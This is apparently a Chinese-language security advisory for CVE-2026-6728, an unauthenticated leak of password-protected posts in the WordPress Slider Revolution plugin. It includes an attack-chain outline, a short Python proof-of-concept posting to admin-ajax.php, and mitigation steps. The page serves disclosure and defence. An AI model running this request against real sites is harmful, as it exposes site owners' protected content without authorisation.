CVE-2026-6728 CVSS 5.3 中危

CVE-2026-6728: Slider Revolution信息泄露漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6728

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Slider Revolution Plugin

漏洞概述

WordPress插件Slider Revolution在7.0.9及之前的版本中存在敏感信息泄露漏洞。该漏洞源于插件中的`get_stream_data()`函数未能正确限制数据访问权限。未经身份验证的攻击者可以利用此漏洞，通过网络向受影响的服务器发送特制请求，从而提取敏感数据。受影响的数据包括已发布但受密码保护的文章、页面和产品内容。由于攻击无需用户交互且利用门槛低，该漏洞对使用受影响版本的网站构成中等风险，可能导致信息泄露。

技术细节

该漏洞的核心原因是Slider Revolution插件中的`get_stream_data()`函数缺乏严格的访问控制检查。通常，受密码保护的内容仅应向拥有正确密码的授权用户展示。然而，在受影响的版本中，该函数在处理请求时，未验证请求者是否具有查看受保护内容的权限，直接通过API接口返回了数据。攻击者无需登录WordPress后台，也无需进行复杂的用户交互。他们只需构造一个指向`get_stream_data()`函数的HTTP请求，并指定目标受保护内容的ID。由于插件逻辑缺陷，服务器会绕过WordPress原生的密码保护机制，将原本应被隐藏的内容直接返回给攻击者。这种信息泄露不仅限于文本内容，还可能包含元数据，从而帮助攻击者进一步规划更有针对性的攻击。CVSS向量（CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N）也表明了这一点：攻击通过网络发起，复杂度低，无需权限即可造成机密性影响。

攻击链分析

STEP 1

信息收集

攻击者扫描目标网站，识别其是否运行WordPress并安装了Slider Revolution插件，并确认版本号小于等于7.0.9。

STEP 2

漏洞探测

攻击者向服务器发送探测请求，验证`get_stream_data()`接口是否存在且是否未对访问权限进行校验。

STEP 3

数据提取

攻击者构造包含特定ID（如受保护的文章或产品ID）的请求，发送给服务器接口，无需密码即可获取受保护的内容。

STEP 4

利用数据

攻击者分析获取到的敏感信息，可能用于进一步的社会工程学攻击或公开泄露数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Payload based on the vulnerable function 'get_stream_data'
# Note: The exact 'action' parameter name depends on plugin implementation registration.
# This is a generic PoC structure for an unauthenticated IDOR/Info Leak.
payload = {
    "action": "get_stream_data",  # The vulnerable function
    "id": "1",                    # ID of the protected post/page/product
    "data_type": "post"           # Type of data to retrieve
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Request successful!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Slider Revolution <= 7.0.9

防御指南

临时缓解措施

建议立即将Slider Revolution插件更新至最新版本以修补漏洞。如果暂时无法更新，应在服务器前端（如Nginx或Apache配置）或通过WAF规则，阻断对包含`get_stream_data`特征参数的请求接口的访问，直到完成更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表